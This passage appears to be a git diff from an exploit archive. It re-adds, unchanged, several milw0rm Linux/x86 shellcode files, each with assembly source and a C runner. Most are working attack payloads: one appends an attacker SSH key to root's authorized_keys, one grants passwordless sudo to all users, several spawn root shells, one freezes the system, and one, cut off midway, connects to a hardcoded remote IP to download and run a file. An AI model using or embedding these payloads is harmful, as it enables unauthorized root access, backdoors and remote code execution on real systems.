-"\x68\x41\x34\x31\x38" // push 
$0x38313441 -"\x68\x65\x33\x76\x4d" // push $0x4d763365 -"\x68\x48\x6f\x78\x77" // push $0x77786f48 -"\x68\x34\x6d\x46\x36" // push $0x36466d34 -"\x68\x48\x39\x6f\x39" // push $0x396f3948 -"\x68\x56\x59\x48\x6a" // push $0x6a485956 -"\x68\x4b\x41\x74\x6d" // push $0x6d74414b -"\x68\x70\x7a\x64\x71" // push $0x71647a70 -"\x68\x50\x2b\x76\x4d" // push $0x4d762b50 -"\x68\x6c\x47\x51\x43" // push $0x4351476c -"\x68\x50\x68\x4f\x32" // push $0x324f6850 -"\x68\x4d\x37\x48\x35" // push $0x3548374d -"\x68\x76\x6b\x6c\x47" // push $0x476c6b76 -"\x68\x37\x74\x4f\x35" // push $0x354f7437 -"\x68\x54\x63\x6e\x77" // push $0x776e6354 -"\x68\x36\x63\x77\x65" // push $0x65776336 -"\x68\x6d\x62\x64\x71" // push $0x7164626d -"\x68\x4e\x32\x75\x70" // push $0x7075324e -"\x68\x74\x73\x6a\x58" // push $0x586a7374 -"\x68\x41\x47\x45\x41" // push $0x41454741 -"\x68\x49\x77\x41\x41" // push $0x41417749 -"\x68\x41\x41\x41\x42" // push $0x42414141 -"\x68\x63\x32\x45\x41" // push $0x41453263 -"\x68\x61\x43\x31\x79" // push $0x79314361 -"\x68\x42\x33\x4e\x7a" // push $0x7a4e3342 -"\x68\x41\x41\x41\x41" // push $0x41414141 -"\x68\x72\x73\x61\x20" // push $0x20617372 -"\x68\x73\x73\x68\x2d" // push $0x2d687373 -"\x89\xe1" // mov %esp,%ecx -"\xb2\xa9" // mov $0xa9,%dl -"\x6a\x04" // push $0x4 ; sys_write() -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x34\xaf" // xor $0xaf,%al ; 0xa9 xor 0xaf = 0x6 ( sys_close() ) -"\xcd\x80" // int $0x80 -"\x04\x0f" // add $0xf,%al ; sys_chmod() -"\x89\xf3" // mov %esi,%ebx -"\x66\xb9\x80\x01" // mov $0x180,%cx ; 0600 para que ssh no se queje -"\xcd\x80" // int $0x80 -"\x6a\x01" // push $0x1 ; adios exit -"\x58" // pop %eax -"\xcd\x80"; // int $0x80 - -main(){printf("%d bytes\n", strlen(sc));} -//main(){(*(void (*)()) sc)();} - +/* + linux/x86 shellcode to append rsa key to /root/.ssh/authorized_keys2 + keys found at http://xenomuta.tuxfamily.org/exploits/authkey/ + ssh -i id_rsa_pwn root@pwned-host + + 295 bytes + by XenoMuta + _ __ __ ___ __ + | |/ /__ ____ 
____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta [ arroba ] phreaker [ punto ] net + + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + - God bless you all - + +*/ +unsigned char sc[] = +//<_start>: +"\x31\xd2" // xor %edx,%edx +"\x52" // push %edx +"\x68\x65\x79\x73\x32" // push $0x32737965 ; /root/.ssh/authorized_keys2 +"\x68\x65\x64\x5f\x6b" // push $0x6b5f6465 +"\x68\x6f\x72\x69\x7a" // push $0x7a69726f +"\x68\x61\x75\x74\x68" // push $0x68747561 +"\x68\x73\x73\x68\x2f" // push $0x2f687373 +"\x68\x74\x2f\x2f\x2e" // push $0x2e2f2f74 +"\x68\x2f\x72\x6f\x6f" // push $0x6f6f722f +"\x89\xe3" // mov %esp,%ebx +"\x66\xb9\x41\x04" // mov $0x441,%cx ; O_CREAT | O_APPEND | O_WRONLY +//<_open>: +"\x6a\x05" // push $0x5 ; sys_open() +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +//<_write>: +"\x93" // xchg %eax,%ebx +"\x89\xe6" // mov %esp,%esi +"\x31\xd2" // xor %edx,%edx +"\x52" // push %edx +"\x6a\x0a" // push $0xa +"\x68\x20\x78\x78\x78" // push $0x78787820 ; contenido de id_rsa_pwn.pub +"\x68\x31\x35\x54\x4a" // push $0x4a543531 +"\x68\x56\x39\x48\x57" // push $0x57483956 +"\x68\x6d\x75\x2b\x38" // push $0x382b756d +"\x68\x31\x35\x64\x31" // push $0x31643531 +"\x68\x64\x2f\x71\x69" // push $0x69712f64 +"\x68\x52\x4b\x61\x79" // push $0x79614b52 +"\x68\x70\x70\x79\x6e" // push $0x6e797070 +"\x68\x35\x46\x31\x6d" // push $0x6d314635 +"\x68\x55\x64\x5a\x35" // push $0x355a6455 +"\x68\x4d\x2b\x4c\x63" // push $0x634c2b4d +"\x68\x38\x59\x41\x6d" // push $0x6d415938 +"\x68\x4d\x42\x50\x79" // push $0x7950424d +"\x68\x4c\x44\x4d\x58" // push $0x584d444c +"\x68\x41\x34\x31\x38" // push $0x38313441 +"\x68\x65\x33\x76\x4d" // push $0x4d763365 +"\x68\x48\x6f\x78\x77" // push $0x77786f48 +"\x68\x34\x6d\x46\x36" // push $0x36466d34 +"\x68\x48\x39\x6f\x39" // push $0x396f3948 +"\x68\x56\x59\x48\x6a" // push $0x6a485956 +"\x68\x4b\x41\x74\x6d" // 
push $0x6d74414b +"\x68\x70\x7a\x64\x71" // push $0x71647a70 +"\x68\x50\x2b\x76\x4d" // push $0x4d762b50 +"\x68\x6c\x47\x51\x43" // push $0x4351476c +"\x68\x50\x68\x4f\x32" // push $0x324f6850 +"\x68\x4d\x37\x48\x35" // push $0x3548374d +"\x68\x76\x6b\x6c\x47" // push $0x476c6b76 +"\x68\x37\x74\x4f\x35" // push $0x354f7437 +"\x68\x54\x63\x6e\x77" // push $0x776e6354 +"\x68\x36\x63\x77\x65" // push $0x65776336 +"\x68\x6d\x62\x64\x71" // push $0x7164626d +"\x68\x4e\x32\x75\x70" // push $0x7075324e +"\x68\x74\x73\x6a\x58" // push $0x586a7374 +"\x68\x41\x47\x45\x41" // push $0x41454741 +"\x68\x49\x77\x41\x41" // push $0x41417749 +"\x68\x41\x41\x41\x42" // push $0x42414141 +"\x68\x63\x32\x45\x41" // push $0x41453263 +"\x68\x61\x43\x31\x79" // push $0x79314361 +"\x68\x42\x33\x4e\x7a" // push $0x7a4e3342 +"\x68\x41\x41\x41\x41" // push $0x41414141 +"\x68\x72\x73\x61\x20" // push $0x20617372 +"\x68\x73\x73\x68\x2d" // push $0x2d687373 +"\x89\xe1" // mov %esp,%ecx +"\xb2\xa9" // mov $0xa9,%dl +"\x6a\x04" // push $0x4 ; sys_write() +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x34\xaf" // xor $0xaf,%al ; 0xa9 xor 0xaf = 0x6 ( sys_close() ) +"\xcd\x80" // int $0x80 +"\x04\x0f" // add $0xf,%al ; sys_chmod() +"\x89\xf3" // mov %esi,%ebx +"\x66\xb9\x80\x01" // mov $0x180,%cx ; 0600 para que ssh no se queje +"\xcd\x80" // int $0x80 +"\x6a\x01" // push $0x1 ; adios exit +"\x58" // pop %eax +"\xcd\x80"; // int $0x80 + +main(){printf("%d bytes\n", strlen(sc));} +//main(){(*(void (*)()) sc)();} + // milw0rm.com [2008-11-23] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13331.c b/platforms/lin_x86/shellcode/13331.c index c43155ed2..72a53de72 100755 --- a/platforms/lin_x86/shellcode/13331.c +++ b/platforms/lin_x86/shellcode/13331.c 
@@ -1,71 +1,71 @@ -/* -Author: Rick -Email: rick2600@hotmail.com - -OS: Linux/x86 -Description: Anyone can run sudo without password - -section .text - global _start - -_start: - - ;open("/etc/sudoers", O_WRONLY | O_APPEND); - xor eax, eax - push eax - push 0x7372656f - push 0x6475732f - push 0x6374652f - mov ebx, esp - mov cx, 0x401 - mov al, 0x05 - int 0x80 - - mov ebx, eax - - ;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len); - xor eax, eax - push eax - push 0x0a4c4c41 - push 0x203a4457 - push 0x53534150 - push 0x4f4e2029 - push 0x4c4c4128 - push 0x3d4c4c41 - push 0x204c4c41 - mov ecx, esp - mov dl, 0x1c - mov al, 0x04 - int 0x80 - - ;close(file) - mov al, 0x06 - int 0x80 - - ;exit(0); - xor ebx, ebx - mov al, 0x01 - int 0x80 - -*/ - -#include -#include - -char code[] = -"\x31\xc0\x50\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64" -"\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xb0\x05" -"\xcd\x80\x89\xc3\x31\xc0\x50\x68\x41\x4c\x4c\x0a\x68" -"\x57\x44\x3a\x20\x68\x50\x41\x53\x53\x68\x29\x20\x4e" -"\x4f\x68\x28\x41\x4c\x4c\x68\x41\x4c\x4c\x3d\x68\x41" -"\x4c\x4c\x20\x89\xe1\xb2\x1c\xb0\x04\xcd\x80\xb0\x06" -"\xcd\x80\x31\xdb\xb0\x01\xcd\x80"; - -void main(void) { - - void (*shellcode)() = code; - shellcode(); - -} - +/* +Author: Rick +Email: rick2600@hotmail.com + +OS: Linux/x86 +Description: Anyone can run sudo without password + +section .text + global _start + +_start: + + ;open("/etc/sudoers", O_WRONLY | O_APPEND); + xor eax, eax + push eax + push 0x7372656f + push 0x6475732f + push 0x6374652f + mov ebx, esp + mov cx, 0x401 + mov al, 0x05 + int 0x80 + + mov ebx, eax + + ;write(fd, ALL ALL=(ALL) NOPASSWD: ALL\n, len); + xor eax, eax + push eax + push 0x0a4c4c41 + push 0x203a4457 + push 0x53534150 + push 0x4f4e2029 + push 0x4c4c4128 + push 0x3d4c4c41 + push 0x204c4c41 + mov ecx, esp + mov dl, 0x1c + mov al, 0x04 + int 0x80 + + ;close(file) + mov al, 0x06 + int 0x80 + + ;exit(0); + xor ebx, ebx + mov al, 0x01 + int 0x80 + +*/ + +#include +#include + +char code[] = 
+"\x31\xc0\x50\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64" +"\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xb0\x05" +"\xcd\x80\x89\xc3\x31\xc0\x50\x68\x41\x4c\x4c\x0a\x68" +"\x57\x44\x3a\x20\x68\x50\x41\x53\x53\x68\x29\x20\x4e" +"\x4f\x68\x28\x41\x4c\x4c\x68\x41\x4c\x4c\x3d\x68\x41" +"\x4c\x4c\x20\x89\xe1\xb2\x1c\xb0\x04\xcd\x80\xb0\x06" +"\xcd\x80\x31\xdb\xb0\x01\xcd\x80"; + +void main(void) { + + void (*shellcode)() = code; + shellcode(); + +} + // milw0rm.com [2008-11-19] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13332.c b/platforms/lin_x86/shellcode/13332.c index d8c96b5fd..936422ca0 100755 --- a/platforms/lin_x86/shellcode/13332.c +++ b/platforms/lin_x86/shellcode/13332.c 
@@ -1,54 +1,54 @@ -/* - ▐▄∙ ▄ ▄▄▄ . ▐ ▄ ∙ ▌ ▄ ·. ▄∙ ▄▌ ▄▄▄▄▄ ▄▄▄· - █▌█▌■ ▀▄.▀· ∙█▌▐█ ■ ·██ ▐███■ █■██▌ ∙██ ▐█ ▀█ - ·██· ▐▀▀■▄ ▐█▐▐▌ ▄█▀▄ ▐█ ▌▐▌▐█· █▌▐█▌ ▐█.■ ▄█▀▀█ - ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌ ▐█▌· ▐█ ■▐▌ - ∙▀▀ ▀▀ ▀▀▀ ▀▀ █■ ▀█▄▀■ ▀▀ █■▀▀▀ ▀▀▀ ▀▀▀ ▀ ▀ - -Ho' Detector (Promiscuous mode detector shellcode) -by XenoMuta -http://xenomuta.tuxfamily.org/ - -This shellcode uses a stupid, yet effective method -for detecting sniffing on all interfaces in linux: -parsing /proc/net/packet, which contains libpcap's -stats and only one line (56 bytes) when not sniffing. -*/ - -char sc[]= -"\x66\x31\xC0" // xor eax,eax -"\x66\x50" // push eax -"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket -"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa -"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne -"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro -"\xB0\x05" // mov al,0x5 ; open() -"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet -"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY -"\xCD\x80" // int 0x80 -"\x66\x93" // xchg eax,ebx -"\x6A\x03" // push byte +0x3 ; read() -"\x66\x58" // pop eax -"\x66\x89\xE1" // mov ecx,esp -"\x6A\x39" // push byte +0x39 ; at most 57 bytes -"\x66\x5A" // pop edx -"\xCD\x80" // int 0x80 -"\x3C\x38" // cmp al,0x38 ; if only 56 bytes -"\x74\x06" // jz 0x40 ; there is no packet -"\x6A\x01" // push byte +0x1 ; capture. Proceed -"\x66\x58" // pop eax ; with shellcode -"\xCD\x80" // int 0x80 ; else, exit() -/* -Append your shellcode here -*/ -"\x90"; - -main(){(*(void (*)()) sc)();} ------BEGIN PGP SIGNATURE----- - -iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s -opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp -=ISTU ------END PGP SIGNATURE----- - +/* + ▐▄∙ ▄ ▄▄▄ . ▐ ▄ ∙ ▌ ▄ ·. 
▄∙ ▄▌ ▄▄▄▄▄ ▄▄▄· + █▌█▌■ ▀▄.▀· ∙█▌▐█ ■ ·██ ▐███■ █■██▌ ∙██ ▐█ ▀█ + ·██· ▐▀▀■▄ ▐█▐▐▌ ▄█▀▄ ▐█ ▌▐▌▐█· █▌▐█▌ ▐█.■ ▄█▀▀█ + ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌ ▐█▌· ▐█ ■▐▌ + ∙▀▀ ▀▀ ▀▀▀ ▀▀ █■ ▀█▄▀■ ▀▀ █■▀▀▀ ▀▀▀ ▀▀▀ ▀ ▀ + +Ho' Detector (Promiscuous mode detector shellcode) +by XenoMuta +http://xenomuta.tuxfamily.org/ + +This shellcode uses a stupid, yet effective method +for detecting sniffing on all interfaces in linux: +parsing /proc/net/packet, which contains libpcap's +stats and only one line (56 bytes) when not sniffing. +*/ + +char sc[]= +"\x66\x31\xC0" // xor eax,eax +"\x66\x50" // push eax +"\x66\x68\x63\x6B\x65\x74" // push dword 0x74656b63 ; cket +"\x66\x68\x74\x2F\x70\x61" // push dword 0x61702f74 ; t/pa +"\x66\x68\x63\x2F\x6E\x65" // push dword 0x656e2f63 ; c/ne +"\x66\x68\x2F\x70\x72\x6F" // push dword 0x6f72702f ; /pro +"\xB0\x05" // mov al,0x5 ; open() +"\x66\x89\xE3" // mov ebx,esp ; /proc/net/packet +"\x66\x31\xC9" // xor ecx,ecx ; O_RDONLY +"\xCD\x80" // int 0x80 +"\x66\x93" // xchg eax,ebx +"\x6A\x03" // push byte +0x3 ; read() +"\x66\x58" // pop eax +"\x66\x89\xE1" // mov ecx,esp +"\x6A\x39" // push byte +0x39 ; at most 57 bytes +"\x66\x5A" // pop edx +"\xCD\x80" // int 0x80 +"\x3C\x38" // cmp al,0x38 ; if only 56 bytes +"\x74\x06" // jz 0x40 ; there is no packet +"\x6A\x01" // push byte +0x1 ; capture. Proceed +"\x66\x58" // pop eax ; with shellcode +"\xCD\x80" // int 0x80 ; else, exit() +/* +Append your shellcode here +*/ +"\x90"; + +main(){(*(void (*)()) sc)();} +-----BEGIN PGP SIGNATURE----- + +iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s +opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp +=ISTU +-----END PGP SIGNATURE----- + // milw0rm.com [2008-11-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13333.txt b/platforms/lin_x86/shellcode/13333.txt index 6adb01b3e..f2692960a 100755 --- a/platforms/lin_x86/shellcode/13333.txt +++ b/platforms/lin_x86/shellcode/13333.txt 
@@ -1,57 +1,57 @@ --------------------[ASM]---------------------- - -global _start -section .text -_start: -;setuid(0) -xor ebx,ebx -lea eax,[ebx+17h] -cdq -int 80h -;execve("/bin/sh",0,0) -xor ecx,ecx -push ecx -push 0x68732f6e -push 0x69622f2f -lea eax,[ecx+0Bh] -mov ebx,esp -int 80h - --------------------[/ASM]---------------------- - --------------------[C]---------------------- - -#include - -const char shellcode[]= "\x31\xdb" - "\x8d\x43\x17" - "\x99" - "\xcd\x80" - "\x31\xc9" - "\x51" - "\x68\x6e\x2f\x73\x68" - "\x68\x2f\x2f\x62\x69" - "\x8d\x41\x0b" - "\x89\xe3" - "\xcd\x80"; - -int main() -{ - printf ("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE" - "WITHOUT NULLS THAT SPAWNS A SHELL" - "\n\nCoded by Chema Garcia (aka sch3m4)" - "\n\t + sch3m4@opensec.es" - "\n\t + http://opensec.es" - "\n\n[+] Date: 29/11/2008" - "\n[+] Thanks to: vlan7" - "\n\n[+] Shellcode Size: %d bytes\n\n", - sizeof(shellcode)-1); - - (*(void (*)()) shellcode)(); - - return 0; -} - --------------------[C]---------------------- - +-------------------[ASM]---------------------- + +global _start +section .text +_start: +;setuid(0) +xor ebx,ebx +lea eax,[ebx+17h] +cdq +int 80h +;execve("/bin/sh",0,0) +xor ecx,ecx +push ecx +push 0x68732f6e +push 0x69622f2f +lea eax,[ecx+0Bh] +mov ebx,esp +int 80h + +-------------------[/ASM]---------------------- + +-------------------[C]---------------------- + +#include + +const char shellcode[]= "\x31\xdb" + "\x8d\x43\x17" + "\x99" + "\xcd\x80" + "\x31\xc9" + "\x51" + "\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69" + "\x8d\x41\x0b" + "\x89\xe3" + "\xcd\x80"; + +int main() +{ + printf ("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE" + "WITHOUT NULLS THAT SPAWNS A SHELL" + "\n\nCoded by Chema Garcia (aka sch3m4)" + "\n\t + sch3m4@opensec.es" + "\n\t + http://opensec.es" + "\n\n[+] Date: 29/11/2008" + "\n[+] Thanks to: vlan7" + "\n\n[+] Shellcode Size: %d bytes\n\n", + sizeof(shellcode)-1); + + (*(void (*)()) shellcode)(); + + 
return 0; +} + +-------------------[C]---------------------- + # milw0rm.com [2008-11-13] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13334.txt b/platforms/lin_x86/shellcode/13334.txt index 3affd2a39..17ae4de67 100755 --- a/platforms/lin_x86/shellcode/13334.txt +++ b/platforms/lin_x86/shellcode/13334.txt 
@@ -1,54 +1,54 @@ -{==========================================================} -{ linux x86 setresuid(0,0,0)-/bin/sh shellcode 35 bytes } -{==========================================================} - -Shellcode by the FHM crew: ----------------------------- -http://fhm.noblogs.org ----------------------------- - -Contact us at: - --------------------------------------------------- -sorrow: rawhazard@autistici.org; betat@hotmail.it --------------------------------------------------- -fhm: fhm@autistici.org; --------------------------------------------------- - - -Assembly code: - ---[code]-- -BITS 32 - -;setresuid(0,0,0) -xor eax, eax -xor ebx, ebx -xor ecx, ecx -cdq -mov BYTE al, 0xa4 -int 0x80 - -;execve("/bin//sh", ["/bin//sh", NULL], [NULL]) -push BYTE 11 -pop eax -push ecx -push 0x68732f2f -push 0x6e69622f -mov ebx, esp -push ecx -mov edx, esp -push ebx -mov ecx, esp -int 0x80 ---[/code]-- - -Shellcode string: ---[code]-- -char shellcode [] = -"\x80\xcd\xe1\x89\x53\xe2\x89\x51\xe3\x89\x6e\x69\x62\x2f\x68\x68\x73\x2f\x2f - -\x68\x51\x58\x0b\x6a\x80\xcd\xa4\xb0\x99\xc9\x31\xdb\x31\xc0\x31" --[/code]- - +{==========================================================} +{ linux x86 setresuid(0,0,0)-/bin/sh shellcode 35 bytes } +{==========================================================} + +Shellcode by the FHM crew: +---------------------------- +http://fhm.noblogs.org +---------------------------- + +Contact us at: + +-------------------------------------------------- +sorrow: rawhazard@autistici.org; betat@hotmail.it +-------------------------------------------------- +fhm: fhm@autistici.org; +-------------------------------------------------- + + +Assembly code: + +--[code]-- +BITS 32 + +;setresuid(0,0,0) +xor eax, eax +xor ebx, ebx +xor ecx, ecx +cdq +mov BYTE al, 0xa4 +int 0x80 + +;execve("/bin//sh", ["/bin//sh", NULL], [NULL]) +push BYTE 11 +pop eax +push ecx +push 0x68732f2f +push 0x6e69622f +mov ebx, esp +push ecx +mov edx, esp +push ebx +mov ecx, esp +int 
0x80 +--[/code]-- + +Shellcode string: +--[code]-- +char shellcode [] = +"\x80\xcd\xe1\x89\x53\xe2\x89\x51\xe3\x89\x6e\x69\x62\x2f\x68\x68\x73\x2f\x2f + +\x68\x51\x58\x0b\x6a\x80\xcd\xa4\xb0\x99\xc9\x31\xdb\x31\xc0\x31" +-[/code]- + # milw0rm.com [2008-09-29] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13335.c b/platforms/lin_x86/shellcode/13335.c index 97669deaa..d46609705 100755 --- a/platforms/lin_x86/shellcode/13335.c +++ b/platforms/lin_x86/shellcode/13335.c 
@@ -1,43 +1,43 @@ -/* - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ dun[at]strcpy.pl ] - - [ linux/x86 iopl(3); asm("cli"); while(1){} 12 bytes ] - - ############################################################### - iopl(3); asm("cli"); while(1){} - // * this code cause freezeing system - ################################################################# - - __asm__( - "xorl %eax, %eax\n" - "pushl $0x3\n" - "popl %ebx\n" - "movb $0x6e,%al\n" - "int $0x80\n" - "cli\n" - "x1:\n" - "jmp x1\n" - ); - -*/ - - -char shellcode[]="\x31\xc0\x6a\x03\x5b\xb0\x6e\xcd\x80\xfa\xeb\xfe"; - -int main() { - - void (*sc)(); - sc = (void *)&shellcode; - sc(); - -return 0; -} - +/* + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ dun[at]strcpy.pl ] + + [ linux/x86 iopl(3); asm("cli"); while(1){} 12 bytes ] + + ############################################################### + iopl(3); asm("cli"); while(1){} + // * this code cause freezeing system + ################################################################# + + __asm__( + "xorl %eax, %eax\n" + "pushl $0x3\n" + "popl %ebx\n" + "movb $0x6e,%al\n" + "int $0x80\n" + "cli\n" + "x1:\n" + "jmp x1\n" + ); + +*/ + + +char shellcode[]="\x31\xc0\x6a\x03\x5b\xb0\x6e\xcd\x80\xfa\xeb\xfe"; + +int main() { + + void (*sc)(); + sc = (void *)&shellcode; + sc(); + +return 0; +} + // milw0rm.com [2008-09-17] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13336.c b/platforms/lin_x86/shellcode/13336.c index 6c5d1bb2a..5c55ffdad 100755 --- a/platforms/lin_x86/shellcode/13336.c +++ b/platforms/lin_x86/shellcode/13336.c 
@@ -1,40 +1,40 @@ -/* -By Thomas Rinsma (16 apr. 2008) - -Shellcode makes system speaker beep once, 45 bytes: - - - ; int fd = open("/dev/tty10", O_RDONLY); - push byte 5 - pop eax - cdq - push edx - push 0x30317974 - push 0x742f2f2f - push 0x7665642f - mov ebx, esp - mov ecx, edx - int 80h - - ; ioctl(fd, KDMKTONE (19248), 66729180); - mov ebx, eax - push byte 54 - pop eax - mov ecx, 4294948047 - not ecx - mov edx, 66729180 - int 80h -*/ - - -main() -{ - char shellcode[] = - "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74" - "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36" - "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80"; - - (*(void (*)()) shellcode)(); -} - +/* +By Thomas Rinsma (16 apr. 2008) + +Shellcode makes system speaker beep once, 45 bytes: + + + ; int fd = open("/dev/tty10", O_RDONLY); + push byte 5 + pop eax + cdq + push edx + push 0x30317974 + push 0x742f2f2f + push 0x7665642f + mov ebx, esp + mov ecx, edx + int 80h + + ; ioctl(fd, KDMKTONE (19248), 66729180); + mov ebx, eax + push byte 54 + pop eax + mov ecx, 4294948047 + not ecx + mov edx, 66729180 + int 80h +*/ + + +main() +{ + char shellcode[] = + "\x6a\x05\x58\x99\x52\x68\x74\x79\x31\x30\x68\x2f\x2f\x2f\x74" + "\x68\x2f\x64\x65\x76\x89\xe3\x89\xd1\xcd\x80\x89\xc3\x6a\x36" + "\x58\xb9\xcf\xb4\xff\xff\xf7\xd1\xba\xdc\x34\xfa\x03\xcd\x80"; + + (*(void (*)()) shellcode)(); +} + // milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13337.c b/platforms/lin_x86/shellcode/13337.c index 099e9e2ba..ed7e3b399 100755 --- a/platforms/lin_x86/shellcode/13337.c +++ b/platforms/lin_x86/shellcode/13337.c 
@@ -1,136 +1,136 @@ -/* -;file download shellcode (149 bytes) -; -;connect back, download a file and execute. -;modify the name of the file and the ip address first. -; -;militan -;Advanced Defense Lab(ADL) -; - - - -global _start - -_start: - -xor ecx,ecx -mul ecx -xor ebx,ebx -cdq - -;socket -push eax -push byte 0x1 -push byte 0x2 -mov ecx,esp -inc ebx -mov al,0x66 -int 0x80 -mov edi,eax ;edi=sockfd - - -;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23) -push edx -push long 0x2335738c ;address * -push word 0x0f27 ;port * -mov dl,0x02 -push dx ;family 1 -mov ecx,esp ;adjust struct -push byte 0x10 -push ecx -push edi ;sockfd -mov ecx,esp -mov bl,3 -mov al,102 -int 0x80 - -;sys_open(cb,O_WRONLY|O_CREATE|O_TRUNC[0001.0100.1000=1101],700) -xor ebx,ebx -xor ecx,ecx -push ecx -push word 0x6263 ;file name="cb" -mov ebx,esp -mov cx,0x242 -mov dx,0x1c0 ;Octal -mov al,5 -int 0x80 -mov esi,eax ;esi=fd - - -; -xor ecx,ecx -mul ecx -cdq -mov dx,0x03e8 ;memory chunk=1000=0x03e8: read per time - -L1: -;sys_read(socket sockfd,buf,len) -xor ebx,ebx -xor eax,eax -mov al,3 -mov ebx,edi ;edi=sock fd -lea ecx,[esp-1000] ;memory chunk -int 0x80 -;sys_write(fd,*buf,count) -mov ebx,esi -mov edx,eax -xor eax,eax -mov al,4 -int 0x80 -cmp dx,0x03e8 -je L1 ;loop - - -CONTINUE: -;sys_close(fd) -mov ebx,esi -xor eax,eax -mov al,6 -int 0x80 - -;execve[./cb,0] -xor ecx,ecx -mul ecx -push ecx -push word 0x6263 ;file name="cb" -mov ebx,esp -push ecx -push ebx -mov ecx,esp -mov al,0x0b -int 0x80 - - -EXIT: -xor eax,eax -xor ebx,ebx -inc eax -int 0x80 -*/ - -#include -#include -#include - - -unsigned char shellcode[]="\x31\xc9\xf7\xe1\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\x43\xb0\x66\xcd\x80" -"\x89\xc7\x52\x68\x8c\x73\x35\x23\x66\x68\x27\x0f\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb3\x03\xb0\x66\xcd\x80" -"\x31\xdb\x31\xc9\x51\x66\x68\x63\x62\x89\xe3\x66\xb9\x42\x02\x66\xba\xc0\x01\xb0\x05\xcd\x80" - 
-"\x89\xc6\x31\xc9\xf7\xe1\x99\x66\xba\xe8\x03\x31\xdb\x31\xc0\xb0\x03\x89\xfb\x8d\x8c\x24\x18\xfc\xff\xff\xcd\x80\x89\xf3\x89\xc2\x31\xc0\xb0\x04\xcd\x80" -"\x66\x81\xfa\xe8\x03\x74\xde\x89\xf3\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x51\x66\x68\x63\x62\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80" -"\x31\xc0\x31\xdb\x40\xcd\x80"; - -void k(){ - int *ret; - ret=(int *)&ret+2; - (*ret)=(int)shellcode; -} - -int main (){ - k(); - return 0; -} - +/* +;file download shellcode (149 bytes) +; +;connect back, download a file and execute. +;modify the name of the file and the ip address first. +; +;militan +;Advanced Defense Lab(ADL) +; + + + +global _start + +_start: + +xor ecx,ecx +mul ecx +xor ebx,ebx +cdq + +;socket +push eax +push byte 0x1 +push byte 0x2 +mov ecx,esp +inc ebx +mov al,0x66 +int 0x80 +mov edi,eax ;edi=sockfd + + +;connect,port(9999)=270f ip(140.115.53.35)=(8c.73.35.23) +push edx +push long 0x2335738c ;address * +push word 0x0f27 ;port * +mov dl,0x02 +push dx ;family 1 +mov ecx,esp ;adjust struct +push byte 0x10 +push ecx +push edi ;sockfd +mov ecx,esp +mov bl,3 +mov al,102 +int 0x80 + +;sys_open(cb,O_WRONLY|O_CREATE|O_TRUNC[0001.0100.1000=1101],700) +xor ebx,ebx +xor ecx,ecx +push ecx +push word 0x6263 ;file name="cb" +mov ebx,esp +mov cx,0x242 +mov dx,0x1c0 ;Octal +mov al,5 +int 0x80 +mov esi,eax ;esi=fd + + +; +xor ecx,ecx +mul ecx +cdq +mov dx,0x03e8 ;memory chunk=1000=0x03e8: read per time + +L1: +;sys_read(socket sockfd,buf,len) +xor ebx,ebx +xor eax,eax +mov al,3 +mov ebx,edi ;edi=sock fd +lea ecx,[esp-1000] ;memory 